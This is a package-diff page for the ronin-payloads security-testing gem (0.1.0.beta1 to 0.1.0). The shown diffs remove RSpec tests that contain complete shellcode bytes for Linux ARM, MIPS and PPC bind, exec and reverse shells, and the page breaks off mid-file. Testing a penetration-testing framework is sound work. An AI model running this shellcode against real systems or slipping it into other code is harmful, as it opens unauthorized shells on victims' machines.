ronin-payloads 0.1.0.beta1 → 0.1.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (227) hide show
  1. checksums.yaml +4 -4
  2. data/.github/workflows/ruby.yml +1 -0
  3. data/.yardopts +1 -1
  4. data/README.md +4 -3
  5. data/bin/ronin-payloads +1 -1
  6. data/gemspec.yml +8 -7
  7. data/lib/ronin/payloads/asm_payload.rb +1 -1
  8. data/lib/ronin/payloads/binary_payload.rb +1 -1
  9. data/lib/ronin/payloads/builtin/cmd/awk/reverse_shell.rb +1 -1
  10. data/lib/ronin/payloads/builtin/cmd/bash/reverse_shell.rb +1 -1
  11. data/lib/ronin/payloads/builtin/cmd/lua/reverse_shell.rb +1 -1
  12. data/lib/ronin/payloads/builtin/cmd/node/reverse_shell.rb +1 -1
  13. data/lib/ronin/payloads/builtin/cmd/openssl/reverse_shell.rb +1 -1
  14. data/lib/ronin/payloads/builtin/cmd/perl/reverse_shell.rb +1 -1
  15. data/lib/ronin/payloads/builtin/cmd/php/reverse_shell.rb +1 -1
  16. data/lib/ronin/payloads/builtin/cmd/powershell/reverse_shell.rb +1 -1
  17. data/lib/ronin/payloads/builtin/cmd/python/reverse_shell.rb +1 -1
  18. data/lib/ronin/payloads/builtin/cmd/ruby/reverse_shell.rb +1 -1
  19. data/lib/ronin/payloads/builtin/java/reverse_shell.rb +1 -1
  20. data/lib/ronin/payloads/builtin/php/cmd_exec.rb +1 -1
  21. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +1 -1
  22. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +1 -1
  23. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +1 -1
  24. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +1 -1
  25. data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +1 -1
  26. data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +1 -1
  27. data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +1 -1
  28. data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +1 -1
  29. data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +1 -1
  30. data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +1 -1
  31. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +1 -1
  32. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +1 -1
  33. data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -2
  34. data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +1 -1
  35. data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +1 -1
  36. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -2
  37. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +1 -1
  38. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +1 -1
  39. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +1 -1
  40. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +1 -1
  41. data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +1 -1
  42. data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/reverse_shell.rb +1 -1
  43. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +1 -1
  44. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +1 -1
  45. data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +1 -1
  46. data/lib/ronin/payloads/builtin/test/open_redirect.rb +1 -1
  47. data/lib/ronin/payloads/builtin/test/xss.rb +1 -1
  48. data/lib/ronin/payloads/c_payload.rb +1 -1
  49. data/lib/ronin/payloads/cli/command.rb +1 -1
  50. data/lib/ronin/payloads/cli/commands/build.rb +1 -1
  51. data/lib/ronin/payloads/cli/commands/encode.rb +1 -1
  52. data/lib/ronin/payloads/cli/commands/encoder.rb +1 -1
  53. data/lib/ronin/payloads/cli/commands/encoders.rb +2 -2
  54. data/lib/ronin/payloads/cli/commands/irb.rb +1 -1
  55. data/lib/ronin/payloads/cli/commands/launch.rb +1 -1
  56. data/lib/ronin/payloads/cli/commands/list.rb +1 -1
  57. data/lib/ronin/payloads/cli/commands/new.rb +3 -3
  58. data/lib/ronin/payloads/cli/commands/show.rb +2 -2
  59. data/lib/ronin/payloads/cli/encoder_methods.rb +1 -1
  60. data/lib/ronin/payloads/cli/format_option.rb +1 -1
  61. data/lib/ronin/payloads/cli/generator/payload_types.rb +3 -3
  62. data/lib/ronin/payloads/cli/payload_command.rb +1 -1
  63. data/lib/ronin/payloads/cli/payload_methods.rb +1 -1
  64. data/lib/ronin/payloads/cli/printing.rb +1 -1
  65. data/lib/ronin/payloads/cli/ruby_shell.rb +1 -1
  66. data/lib/ronin/payloads/cli.rb +6 -1
  67. data/lib/ronin/payloads/coldfusion_payload.rb +1 -1
  68. data/lib/ronin/payloads/command_payload.rb +1 -1
  69. data/lib/ronin/payloads/encoders/builtin/html/encode.rb +1 -1
  70. data/lib/ronin/payloads/encoders/builtin/js/encode.rb +1 -1
  71. data/lib/ronin/payloads/encoders/builtin/powershell/encode.rb +1 -1
  72. data/lib/ronin/payloads/encoders/builtin/shell/encode.rb +1 -1
  73. data/lib/ronin/payloads/encoders/builtin/sql/encode.rb +1 -1
  74. data/lib/ronin/payloads/encoders/builtin/xml/encode.rb +1 -1
  75. data/lib/ronin/payloads/encoders/encoder.rb +1 -1
  76. data/lib/ronin/payloads/encoders/exceptions.rb +1 -1
  77. data/lib/ronin/payloads/encoders/html_encoder.rb +1 -1
  78. data/lib/ronin/payloads/encoders/javascript_encoder.rb +1 -1
  79. data/lib/ronin/payloads/encoders/pipeline.rb +2 -2
  80. data/lib/ronin/payloads/encoders/powershell_encoder.rb +1 -1
  81. data/lib/ronin/payloads/encoders/registry.rb +1 -1
  82. data/lib/ronin/payloads/encoders/shell_encoder.rb +1 -1
  83. data/lib/ronin/payloads/encoders/sql_encoder.rb +1 -1
  84. data/lib/ronin/payloads/encoders/xml_encoder.rb +1 -1
  85. data/lib/ronin/payloads/encoders.rb +1 -1
  86. data/lib/ronin/payloads/exceptions.rb +1 -1
  87. data/lib/ronin/payloads/go_payload.rb +1 -1
  88. data/lib/ronin/payloads/html_payload.rb +1 -1
  89. data/lib/ronin/payloads/java_payload.rb +1 -1
  90. data/lib/ronin/payloads/javascript_payload.rb +1 -1
  91. data/lib/ronin/payloads/jsp_payload.rb +1 -1
  92. data/lib/ronin/payloads/metadata/arch.rb +1 -1
  93. data/lib/ronin/payloads/metadata/os.rb +1 -1
  94. data/lib/ronin/payloads/mixins/binary.rb +1 -1
  95. data/lib/ronin/payloads/mixins/bind_shell.rb +1 -1
  96. data/lib/ronin/payloads/mixins/build_dir.rb +1 -1
  97. data/lib/ronin/payloads/mixins/erb.rb +1 -1
  98. data/lib/ronin/payloads/mixins/network.rb +1 -1
  99. data/lib/ronin/payloads/mixins/post_ex.rb +1 -1
  100. data/lib/ronin/payloads/mixins/resolve_host.rb +1 -1
  101. data/lib/ronin/payloads/mixins/reverse_shell.rb +1 -1
  102. data/lib/ronin/payloads/mixins/tempfile.rb +1 -1
  103. data/lib/ronin/payloads/mixins/typescript.rb +1 -1
  104. data/lib/ronin/payloads/node_js_payload.rb +1 -1
  105. data/lib/ronin/payloads/payload.rb +1 -1
  106. data/lib/ronin/payloads/php_payload.rb +1 -1
  107. data/lib/ronin/payloads/powershell_payload.rb +1 -1
  108. data/lib/ronin/payloads/python_payload.rb +1 -1
  109. data/lib/ronin/payloads/registry.rb +1 -1
  110. data/lib/ronin/payloads/root.rb +1 -1
  111. data/lib/ronin/payloads/ruby_payload.rb +1 -1
  112. data/lib/ronin/payloads/rust_payload.rb +1 -1
  113. data/lib/ronin/payloads/shell_payload.rb +1 -1
  114. data/lib/ronin/payloads/shellcode/bind_shell_payload.rb +1 -1
  115. data/lib/ronin/payloads/shellcode/exec_shell_payload.rb +1 -1
  116. data/lib/ronin/payloads/shellcode/reverse_shell_payload.rb +1 -1
  117. data/lib/ronin/payloads/shellcode_payload.rb +1 -1
  118. data/lib/ronin/payloads/sql_payload.rb +1 -1
  119. data/lib/ronin/payloads/url_payload.rb +2 -2
  120. data/lib/ronin/payloads/version.rb +2 -2
  121. data/lib/ronin/payloads/xml_payload.rb +1 -1
  122. data/lib/ronin/payloads.rb +1 -1
  123. data/ronin-payloads.gemspec +2 -1
  124. metadata +16 -215
  125. data/spec/asm_payload_spec.rb +0 -114
  126. data/spec/binary_payload_spec.rb +0 -8
  127. data/spec/builtin/cmd/awk/reverse_shell_spec.rb +0 -38
  128. data/spec/builtin/cmd/bash/reverse_shell_spec.rb +0 -36
  129. data/spec/builtin/cmd/lua/reverse_shell_spec.rb +0 -38
  130. data/spec/builtin/cmd/node/reverse_shell_spec.rb +0 -36
  131. data/spec/builtin/cmd/openssl/reverse_shell_spec.rb +0 -38
  132. data/spec/builtin/cmd/perl/reverse_shell_spec.rb +0 -38
  133. data/spec/builtin/cmd/php/reverse_shell_spec.rb +0 -38
  134. data/spec/builtin/cmd/powershell/reverse_shell_spec.rb +0 -38
  135. data/spec/builtin/cmd/python/reverse_shell_spec.rb +0 -38
  136. data/spec/builtin/cmd/ruby/reverse_shell_spec.rb +0 -38
  137. data/spec/builtin/java/reverse_shell_spec.rb +0 -103
  138. data/spec/builtin/php/cmd_exec.rb +0 -52
  139. data/spec/builtin/shellcode/freebsd/x86/bind_shell_spec.rb +0 -58
  140. data/spec/builtin/shellcode/freebsd/x86/exec_shell_spec.rb +0 -46
  141. data/spec/builtin/shellcode/freebsd/x86/reverse_shell_spec.rb +0 -63
  142. data/spec/builtin/shellcode/freebsd/x86_64/exec_shell_spec.rb +0 -46
  143. data/spec/builtin/shellcode/linux/arm/bind_shell_spec.rb +0 -62
  144. data/spec/builtin/shellcode/linux/arm/exec_shell_spec.rb +0 -46
  145. data/spec/builtin/shellcode/linux/arm/reverse_shell_spec.rb +0 -58
  146. data/spec/builtin/shellcode/linux/mips/bind_shell_spec.rb +0 -60
  147. data/spec/builtin/shellcode/linux/mips/exec_shell_spec.rb +0 -46
  148. data/spec/builtin/shellcode/linux/mips/reverse_shell_spec.rb +0 -58
  149. data/spec/builtin/shellcode/linux/ppc/exec_shell_spec.rb +0 -46
  150. data/spec/builtin/shellcode/linux/ppc/reverse_shell_spec.rb +0 -87
  151. data/spec/builtin/shellcode/linux/x86/bind_shell_spec.rb +0 -60
  152. data/spec/builtin/shellcode/linux/x86/exec_shell_spec.rb +0 -46
  153. data/spec/builtin/shellcode/linux/x86/reverse_shell_spec.rb +0 -58
  154. data/spec/builtin/shellcode/linux/x86_64/bind_shell_spec.rb +0 -60
  155. data/spec/builtin/shellcode/linux/x86_64/exec_shell_spec.rb +0 -46
  156. data/spec/builtin/shellcode/linux/x86_64/reverse_shell_spec.rb +0 -58
  157. data/spec/builtin/shellcode/macos/x86_64/exec_shell_spec.rb +0 -46
  158. data/spec/builtin/shellcode/macos/x86_64/reverse_shell_spec.rb +0 -58
  159. data/spec/builtin/shellcode/netbsd/x86/exec_shell_spec.rb +0 -46
  160. data/spec/builtin/shellcode/netbsd/x86/reverse_shell_spec.rb +0 -63
  161. data/spec/builtin/shellcode/openbsd/x86/bind_shell_spec.rb +0 -58
  162. data/spec/builtin/shellcode/openbsd/x86/exec_shell_spec.rb +0 -46
  163. data/spec/builtin/shellcode/windows/x86_64/cmd_spec.rb +0 -54
  164. data/spec/builtin/test/open_redirect_spec.rb +0 -24
  165. data/spec/builtin/test/xss_spec.rb +0 -24
  166. data/spec/c_payload_spec.rb +0 -139
  167. data/spec/cli/commands/show_spec.rb +0 -21
  168. data/spec/cli/encoder_methods_spec.rb +0 -275
  169. data/spec/cli/format_option_spec.rb +0 -187
  170. data/spec/cli/payload_command_spec.rb +0 -68
  171. data/spec/cli/payload_methods_spec.rb +0 -208
  172. data/spec/cli/printing_spec.rb +0 -65
  173. data/spec/cli/ruby_shell_spec.rb +0 -14
  174. data/spec/coldfusion_payload_spec.rb +0 -8
  175. data/spec/command_payload_spec.rb +0 -8
  176. data/spec/encoders/builtin/html/encode_spec.rb +0 -17
  177. data/spec/encoders/builtin/js/encode_spec.rb +0 -17
  178. data/spec/encoders/builtin/powershell/encode_spec.rb +0 -17
  179. data/spec/encoders/builtin/shell/encode_spec.rb +0 -17
  180. data/spec/encoders/builtin/sql/encode_spec.rb +0 -17
  181. data/spec/encoders/builtin/xml/encode_spec.rb +0 -17
  182. data/spec/encoders/encoder_spec.rb +0 -62
  183. data/spec/encoders/html_encoder_spec.rb +0 -8
  184. data/spec/encoders/javascript_encoder_spec.rb +0 -8
  185. data/spec/encoders/pipeline_spec.rb +0 -153
  186. data/spec/encoders/powershell_encoder_spec.rb +0 -8
  187. data/spec/encoders/shell_encoder_spec.rb +0 -8
  188. data/spec/encoders/sql_encoder_spec.rb +0 -8
  189. data/spec/encoders/xml_encoder_spec.rb +0 -8
  190. data/spec/encoders_spec.rb +0 -25
  191. data/spec/go_payload_spec.rb +0 -56
  192. data/spec/helpers/encoders.rb +0 -9
  193. data/spec/helpers/payloads.rb +0 -9
  194. data/spec/helpers/scripts/payloads/simple.rb +0 -22
  195. data/spec/html_payload_spec.rb +0 -12
  196. data/spec/java_payload_spec.rb +0 -97
  197. data/spec/javascript_payload_spec.rb +0 -12
  198. data/spec/jsp_payload_spec.rb +0 -8
  199. data/spec/metadata/arch_spec.rb +0 -82
  200. data/spec/metadata/os_spec.rb +0 -164
  201. data/spec/mixins/binary_spec.rb +0 -129
  202. data/spec/mixins/bind_shell_spec.rb +0 -73
  203. data/spec/mixins/build_dir.rb +0 -64
  204. data/spec/mixins/erb_spec.rb +0 -19
  205. data/spec/mixins/network_spec.rb +0 -75
  206. data/spec/mixins/post_ex_spec.rb +0 -40
  207. data/spec/mixins/resolve_host_spec.rb +0 -322
  208. data/spec/mixins/reverse_shell_spec.rb +0 -103
  209. data/spec/mixins/tempfile_spec.rb +0 -97
  210. data/spec/mixins/typescript_spec.rb +0 -92
  211. data/spec/node_js_payload_spec.rb +0 -8
  212. data/spec/payload_spec.rb +0 -288
  213. data/spec/payloads_spec.rb +0 -29
  214. data/spec/php_payload_spec.rb +0 -8
  215. data/spec/powershell_payload_spec.rb +0 -16
  216. data/spec/python_payload_spec.rb +0 -8
  217. data/spec/ruby_payload_spec.rb +0 -8
  218. data/spec/rust_payload_spec.rb +0 -116
  219. data/spec/shell_payload_spec.rb +0 -16
  220. data/spec/shellcode/bind_shell_payload_spec.rb +0 -42
  221. data/spec/shellcode/exec_shell_payload_spec.rb +0 -8
  222. data/spec/shellcode/reverse_shell_payload_spec.rb +0 -136
  223. data/spec/shellcode_payload_spec.rb +0 -38
  224. data/spec/spec_helper.rb +0 -7
  225. data/spec/sql_payload_spec.rb +0 -12
  226. data/spec/url_payload_spec.rb +0 -72
  227. data/spec/xml_payload_spec.rb +0 -12
@@ -1,62 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/arm/bind_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::ARM::BindShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::BindShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::BindShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/arm/bind_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/arm/bind_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :arm" do
21
- expect(subject.arch).to be(:arm)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- let(:host) { 'example.com' }
34
- let(:port) { 1337 }
35
-
36
- subject do
37
- described_class.new(
38
- params: {
39
- host: host,
40
- port: port
41
- }
42
- )
43
- end
44
-
45
- describe "#build" do
46
- before { subject.build }
47
-
48
- let(:sin_port) { "\x05\x39".b }
49
- let(:sin_port_lo) { sin_port[1] }
50
- let(:sin_port_hi) { sin_port[0] }
51
-
52
- it "must set #payload" do
53
- expect(subject.payload).to eq(
54
- "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1#{sin_port_lo}\x10\xa0\xe3#{sin_port_hi}\x70\xa0\xe3\x01\x1c\xa0\xe1\x07\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d\xe9\x02\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x01\x10\xa0\xe3\x06\x00\xa0\xe1\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01\x10\x51\xe2\xfb\xff\xff\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0\x2f\x30\xa0\xe3\x62\x70\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0\xe3\x07\x38\x83\xe0\x6e\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40\xa0\xe3\x73\x70\xa0\xe3\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07\x48\x84\xe0\x73\x50\xa0\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0\x3e\x00\x2d\xe9\x08\x00\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d\xe2\x0b\x00\x90\xef".b
55
- )
56
- end
57
-
58
- it "must ensure #payload is an ASCII 8bit string" do
59
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
60
- end
61
- end
62
- end
@@ -1,46 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/arm/exec_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::ARM::ExecShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ExecShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ExecShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/arm/exec_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/arm/exec_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :arm" do
21
- expect(subject.arch).to be(:arm)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- describe "#build" do
34
- before { subject.build }
35
-
36
- it "must set #payload" do
37
- expect(subject.payload).to eq(
38
- "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68".b
39
- )
40
- end
41
-
42
- it "must ensure #payload is an ASCII 8bit string" do
43
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
44
- end
45
- end
46
- end
@@ -1,58 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/arm/reverse_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::ARM::ReverseShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ReverseShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ReverseShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/arm/reverse_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/arm/reverse_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :arm" do
21
- expect(subject.arch).to be(:arm)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- let(:host) { '127.0.0.1' }
34
- let(:port) { 1337 }
35
-
36
- subject do
37
- described_class.new(
38
- params: {
39
- host: host,
40
- port: port
41
- }
42
- )
43
- end
44
-
45
- describe "#build" do
46
- before { subject.build }
47
-
48
- it "must set #payload" do
49
- expect(subject.payload).to eq(
50
- "\x01\x10\x8F\xE2\x11\xFF\x2F\xE1\x02\x20\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x05\x39\x7f\x00\x00\x01/bin/sh\0".b
51
- )
52
- end
53
-
54
- it "must ensure #payload is an ASCII 8bit string" do
55
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
56
- end
57
- end
58
- end
@@ -1,60 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/mips/bind_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::MIPS::BindShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::BindShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::BindShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/mips/bind_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/mips/bind_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :mips" do
21
- expect(subject.arch).to be(:mips)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- let(:host) { 'example.com' }
34
- let(:port) { 1337 }
35
-
36
- subject do
37
- described_class.new(
38
- params: {
39
- host: host,
40
- port: port
41
- }
42
- )
43
- end
44
-
45
- describe "#build" do
46
- before { subject.build }
47
-
48
- let(:packed_port) { "\x05\x39".b }
49
-
50
- it "must set #payload" do
51
- expect(subject.payload).to eq(
52
- "\xe0\xff\xbd\x27\xfd\xff\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24\xff\xff\x50\x30\xef\xff\x0e\x24\x27\x70\xc0\x01#{packed_port}\x0d\x24\x04\x68\xcd\x01\xff\xfd\x0e\x24\x27\x70\xc0\x01\x25\x68\xae\x01\xe0\xff\xad\xaf\xe4\xff\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0\xaf\x25\x20\x10\x02\xef\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff\xa5\x23\x49\x10\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24\x25\x20\x10\x02\x01\x01\x05\x24\x4e\x10\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24\x25\x20\x10\x02\xff\xff\x05\x28\xff\xff\x06\x28\x48\x10\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24\xff\xff\x50\x30\x25\x20\x10\x02\xfd\xff\x0f\x24\x27\x28\xe0\x01\xdf\x0f\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24\x25\x20\x10\x02\x01\x01\x05\x28\xdf\x0f\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24\x25\x20\x10\x02\xff\xff\x05\x28\xdf\x0f\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24\x50\x73\x06\x24\xff\xff\xd0\x04\x50\x73\x0f\x24\xff\xff\x06\x28\xdb\xff\x0f\x24\x27\x78\xe0\x01\x21\x20\xef\x03\xf0\xff\xa4\xaf\xf4\xff\xa0\xaf\xf0\xff\xa5\x23\xab\x0f\x02\x24\x0c\x01\x01\x01/bin/sh".b
53
- )
54
- end
55
-
56
- it "must ensure #payload is an ASCII 8bit string" do
57
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
58
- end
59
- end
60
- end
@@ -1,46 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/mips/exec_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::MIPS::ExecShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ExecShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ExecShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/mips/exec_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/mips/exec_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :mips" do
21
- expect(subject.arch).to be(:mips)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- describe "#build" do
34
- before { subject.build }
35
-
36
- it "must set #payload" do
37
- expect(subject.payload).to eq(
38
- "\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x01\x01\x01\x0c".b
39
- )
40
- end
41
-
42
- it "must ensure #payload is an ASCII 8bit string" do
43
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
44
- end
45
- end
46
- end
@@ -1,58 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/mips/reverse_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::MIPS::ReverseShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ReverseShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ReverseShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/mips/reverse_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/mips/reverse_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :mips" do
21
- expect(subject.arch).to be(:mips)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :linux" do
29
- expect(subject.os).to be(:linux)
30
- end
31
- end
32
-
33
- let(:host) { '127.0.0.1' }
34
- let(:port) { 1337 }
35
-
36
- subject do
37
- described_class.new(
38
- params: {
39
- host: host,
40
- port: port
41
- }
42
- )
43
- end
44
-
45
- describe "#build" do
46
- before { subject.build }
47
-
48
- it "must set #payload" do
49
- expect(subject.payload).to eq(
50
- "\x24\x0f\xff\xfd\x01\xe0\x20\x27\x01\xe0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff\x8f\xa4\xff\xff\x24\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x05\x39\x35\xce\x05\x39\xaf\xae\xff\xe4\x3c\x0d\x7f\x00\x35\xad\x00\x01\xaf\xad\xff\xe6\x23\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x0f\xff\xfd\x01\xe0\x28\x27\x8f\xa4\xff\xff\x24\x02\x0f\xdf\x01\x01\x01\x0c\x20\xa5\xff\xff\x24\x01\xff\xff\x14\xa1\xff\xfb\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x01\x01\x01\x0c".b
51
- )
52
- end
53
-
54
- it "must ensure #payload is an ASCII 8bit string" do
55
- expect(subject.payload.encoding).to eq(Encoding::ASCII_8BIT)
56
- end
57
- end
58
- end
@@ -1,46 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/linux/ppc/exec_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::Linux::PPC::ExecShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::ExecShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::ExecShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/linux/ppc/exec_shell'" do
13
- expect(subject.id).to eq('shellcode/linux/ppc/exec_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :ppc" do
21
- expect(subject.arch).to be(:ppc)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
